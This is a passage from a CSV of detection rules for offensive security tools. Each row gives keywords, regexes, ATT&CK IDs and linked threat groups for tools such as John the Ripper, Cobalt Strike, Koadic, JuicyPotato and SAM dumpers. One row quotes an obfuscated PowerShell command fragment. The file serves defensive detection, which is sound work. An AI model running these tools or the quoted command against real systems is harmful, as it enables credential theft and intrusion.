Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50086" "*john *-inc *",".{0,1000}john\s.{0,1000}\-inc\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50087" "*john *-incremental *",".{0,1000}john\s.{0,1000}\-incremental\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50088" "*john *-shells*",".{0,1000}john\s.{0,1000}\-shells.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50089" "*john *-show*",".{0,1000}john\s.{0,1000}\-show.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50090" "*john *-single*",".{0,1000}john\s.{0,1000}\-single.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50091" "*john *-users*",".{0,1000}john\s.{0,1000}\-users.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50092" "*john *-wordlist*",".{0,1000}john\s.{0,1000}\-wordlist.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50093" "*john 
*--wordlist*",".{0,1000}john\s.{0,1000}\-\-wordlist.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50094" "*john --format=*",".{0,1000}john\s\-\-format\=.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50095" "*john hashes*",".{0,1000}john\shashes.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50096" "*john NTDS.dit*",".{0,1000}john\sNTDS\.dit.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50097" "*john --show *",".{0,1000}john\s\-\-show\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50098" "*john 
--status*",".{0,1000}john\s\-\-status.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50099" "*John the Ripper*",".{0,1000}John\sthe\sRipper.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50100" "*john --wordlist*",".{0,1000}john\s\-\-wordlist.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50101" "*john --wordlist=*",".{0,1000}john\s\-\-wordlist\=.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50102" "*John*the*Ripper*",".{0,1000}John.{0,1000}the.{0,1000}Ripper.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50103" 
"*john.bash_completion*",".{0,1000}john\.bash_completion.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50104" "*john.session.log*",".{0,1000}john\.session\.log.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","#logfile","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50105" "*john.zsh_completion*",".{0,1000}john\.zsh_completion.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50106" "*john/password.lst*",".{0,1000}john\/password\.lst.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50107" "*john/run/fuzz.dic*",".{0,1000}john\/run\/fuzz\.dic.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50108" "*john/src/ztex/*",".{0,1000}john\/src\/ztex\/.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black 
Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50109" "*john@moozle.wtf*",".{0,1000}john\@moozle\.wtf.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","#email","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","50110" "*john_crack_asrep*",".{0,1000}john_crack_asrep.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50111" "*john_crack_kerberoast*",".{0,1000}john_crack_kerberoast.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50112" "*john_log_format*",".{0,1000}john_log_format.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50113" 
"*john_mpi.c*",".{0,1000}john_mpi\.c.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50114" "*john_register_all*",".{0,1000}john_register_all.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50115" "*JohnHammond/recaptcha-phish*",".{0,1000}JohnHammond\/recaptcha\-phish.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","1","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","50116" "*JohnTheRipper *",".{0,1000}JohnTheRipper\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50117" "*JohnTheRipper/*",".{0,1000}JohnTheRipper\/.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50118" "*JohnWoodman/stealthInjector*",".{0,1000}JohnWoodman\/stealthInjector.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific 
offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","50119" "*Join us on Telegram - https://t.me/thcorg*",".{0,1000}Join\sus\son\sTelegram\s\-\shttps\:\/\/t\.me\/thcorg.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","50120" "*-JoiN'*[StrIng]::JOIn(* -SPlIt*-sPlit*-SpLiT*-sPlIt*-sPLIt* | fOreacH-obJeCT {( [Int]$_-As[ChAr]) })))"" 1> \Windows\Temp\*",".{0,1000}\-JoiN\'.{0,1000}\[StrIng\]\:\:JOIn\(.{0,1000}\s\-SPlIt.{0,1000}\-sPlit.{0,1000}\-SpLiT.{0,1000}\-sPlIt.{0,1000}\-sPLIt.{0,1000}\s\|\sfOreacH\-obJeCT\s\{\(\s\[Int\]\$_\-As\[ChAr\]\)\s\}\)\)\)\""\s1\>\s\\Windows\\Temp\\.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","50121" "*jojonas/SharpSAMDump*",".{0,1000}jojonas\/SharpSAMDump.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","1","N/A","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","50128" "*Jomungand\vstudio-project*",".{0,1000}Jomungand\\vstudio\-project.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory 
evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","","N/A","","","","50129" "*Jomungand-main*",".{0,1000}Jomungand\-main.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","N/A","10","","N/A","","","","50130" "*joomscan -u *",".{0,1000}joomscan\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50131" "*joomscan*",".{0,1000}joomscan.{0,1000}","offensive_tool_keyword","joomscan","Joomla Vulnerability Scanner.","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","EMBER BEAR","Vulnerability Scanner","https://github.com/rezasp/joomscan","1","0","N/A","N/A","N/A","10","1118","244","2024-09-11T09:08:50Z","2016-09-01T09:06:17Z","50132" "*Jormungand.exe*",".{0,1000}Jormungand\.exe.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","N/A","10","","N/A","","","","50133" "*Jormungand.vcxproj*",".{0,1000}Jormungand\.vcxproj.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","N/A","10","","N/A","","","","50134" 
"*Jormungandr.cpp*",".{0,1000}Jormungandr\.cpp.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","50135" "*Jormungandr.exe*",".{0,1000}Jormungandr\.exe.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","50136" "*Jormungandr-master*",".{0,1000}Jormungandr\-master.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","50137" "*journalctl -u isc-dhcp-server.service | tail -n 50*",".{0,1000}journalctl\s\-u\sisc\-dhcp\-server\.service\s\|\stail\s\-n\s50.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","50138" 
"*jp.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}jp\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","50139" "*JPG0mez/ADCSync*",".{0,1000}JPG0mez\/ADCSync.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","1","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","50140" "*jpillora/chisel*",".{0,1000}jpillora\/chisel.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","50142" "*jplesueur@phrozen.io*",".{0,1000}jplesueur\@phrozen\.io.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#email","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","50143" "*jqlcrn2fsfvxlngdq53rqyrwtwfrulup74xyle54bsvo3l2kgpeeijid.onion*",".{0,1000}jqlcrn2fsfvxlngdq53rqyrwtwfrulup74xyle54bsvo3l2kgpeeijid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50148" "*jquery-c2.*.profile*",".{0,1000}jquery\-c2\..{0,1000}\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","50149" 
"*js-cracker-client/cracker.js*",".{0,1000}js\-cracker\-client\/cracker\.js.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","50150" "*JScriptStager*",".{0,1000}JScriptStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50151" "*jtee43gt-6543-2iur-9422-83r5w27hgzaq*",".{0,1000}jtee43gt\-6543\-2iur\-9422\-83r5w27hgzaq.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","50152" 
"*juicycreds_dump*",".{0,1000}juicycreds_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50153" "*JuicyPotato v%s*",".{0,1000}JuicyPotato\sv\%s.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50154" "*JuicyPotato v%s*",".{0,1000}JuicyPotato\sv\%s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","JuicyPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50155" "*JuicyPotato.exe*",".{0,1000}JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50156" 
"*JuicyPotato.exe*",".{0,1000}JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50157" "*JuicyPotato.exe*",".{0,1000}JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","JuicyPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50158" "*JuicyPotato.exe*",".{0,1000}JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","50159" "*JuicyPotato.sln*",".{0,1000}JuicyPotato\.sln.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50160" "*JuicyPotato.vcxproj*",".{0,1000}JuicyPotato\.vcxproj.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
